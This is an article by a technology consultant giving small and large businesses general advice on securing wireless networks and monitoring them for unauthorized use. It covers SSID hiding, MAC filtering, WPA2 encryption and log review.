Monitoring & Preventing Problems on Wireless…
Residential and commercial users all have started using wireless connectivity more and more. You can hop online at almost any coffee shop, airport, college campus or, in some areas, even outdoors in public parks. There are also thousands of wireless networks that are not public. Many of those networks are unsecured when they should be, and due to either bad administration or company owners who don’t understand the risks or know how to implement security, they are left open, possibly risking their corporate data.
A surprisingly large number of wireless networks are not properly secured. Anyone with a laptop can walk around your office or neighborhood and use your Internet connection. This is commonly known as war-driving, or war-walking in this case. War-drivers might use this skill to gain access to the Internet to look up directions, an e-mail address or a phone number, but this open access also means that a user can browse any shares on your servers or workstations and possibly copy, delete or corrupt your data. Clearly, this kind of security breach is a huge headache for administrators, but it can be easily remedied with some smart purchases and proper administration.
Different sizes and types of businesses use wireless for different purposes. Small companies and large business alike use wireless to forgo the costs of wiring an office. There are some companies that want visitors and guests to be able to gain Internet access without allowing them to access the corporate network. And of course, there are some that have wireless access strictly for customer use. The biggest distinction on any of these networks is whether or not a wireless network user can access corporate or personal data. If they can, you most likely would want it to be secured properly.
For a small office, the variety of wireless products is staggering. Linksys, D-Link and Netgear wireless products are all popular, and are sold at a wide variety of local retail stores. Their focus is small office and home usage, and all are easy to set up and properly secure. Medium to large businesses tend to go with more scalable wireless solutions that can have multiple access points with a shared security system so that when users move from one conference room to another, they can switch access points seamlessly without interference. Many companies rely on Cisco and Nortel products to deploy these kinds of solutions.
For unsecured, public networks, you should ensure there is no data on the network at all and that the passwords on the wireless access points and router or firewalls are secure. Optionally, some combination products like Sonicwall or Watchguard have wireless access points integrated into already-well-known firewall products, which can allow you to put the wireless interface into a DMZ, virtually separating your private business network and your wireless public network. At that point, you can also lock down the wireless usage to only permit certain types of outbound traffic, such as SMTP, POP, HTTP and HTTPS, preventing your network from being used for more than checking e-mail and Web surfing. The downside to many firewall-integrated models is cost. Many of these products have an associated cost per license, making it harder for a small business owner to justify their purchase.
There are various ways to secure the wireless network. One common tactic is to not broadcast your SSID. This means that when people look for the network, it won’t show up. You can only connect to it if you explicitly know the SSID name. This is more of a method of hiding your wireless network than securing it. (“Security by obscurity,” as they say.) When setting up an access point, one of the most important things to do is change the SSID to something to either help users know which access point to use, or something to deter them from using it. A friend of mine named his access point “BROKEN-Do_not_use.” But many small businesses just use their company name, so it is easy to recognize. While this may be convenient for end users, for a potential attacker, it makes it simple to find the door to your corporate network.
One way to secure smaller networks is by using MAC address filtering. This allows you to program your access point to only allow “known” network devices to attach to it. The downside to this is that it can be tedious to keep track once you get more than 15 devices on your network. Also, it is not 100 percent safe, since many network drivers and devices allow MAC address spoofing. However, a potential hacker would have to know your MAC address as well, but if someone really wanted in, clearly the MAC address filtering alone is not enough.
Another potential way to secure your wireless network is to not use DHCP. Choose an unusual Class C range to use on your network, and use a static IP address on all clients. Clearly, this defeats some of the reasons you would use DHCP on your network. It’s not always a good solution, because if you go to static IPs, it’s another thing to keep track of.
Most forms of wireless security use an encryption code known as a WEP or WPA key. WEP is not recommended as often as it used to be, as it has been cracked and broken into rather easily using products like AirSnort, which listens for packets and, once it collects enough, recovers your WEP key. WPA, and the second generation, known as WPA2, is now much more popular. WPA2 is backwards-compatible to older WPA-only devices, and is available in two versions: WPA – Personal, which allows a device to have a common shared password that clients can use to access it; and WPA – Enterprise which relies on a RADIUS server to authenticate users. Alternatively, RADIUS can be used alone on many devices, but anyone using this alone should move to WPA2 for the additional security.
Once you secure your wireless network, you need to confirm that no one you don’t know is using it. One of the easiest ways to see a list of machines that recently used your wireless device is to check your DHCP server’s logs. As long as you recognize the machine names, your wireless network has not been used by strangers. Clearly, this line of monitoring will only work for small networks. For medium to large businesses, it is harder to monitor DHCP to find information, so you need to use more complex methods of logging and monitoring.
One of the best ways is to look into the different logging functionalities of your wireless devices. Many of the small office and home office devices have limited logging functionality, as they do not have enough onboard memory to store very much data, and some do not have the functionality to do logging to another device. Syslog and syslogd are older UNIX terms for the daemon that can be run on any UNIX or Windows machine to capture real-time data from network devices, saving it to a log file for later investigation as needed. There are also many freeware and shareware utilities for parsing through these logs.
Wireless technology will be an ever-changing thing. The different secure ways to access networks will constantly change as issues are found with them, or people figure out how to get past existing security measures. As much as any retailer or salesperson tells you the technology is foolproof and secure, the hardware manufacturers continually release new firmware for their devices and newer devices with additional security features for a reason. It behooves any network administrator, company owner or technology advisor to stay current on wireless security and to know and understand what threatens their network and how to look for it. For more information, check out www.wi-fi.org.
Chris Lehr is a self-employed technology consultant who has worked with many small to medium-sized businesses, as well as several large multinational corporations. He can be reached at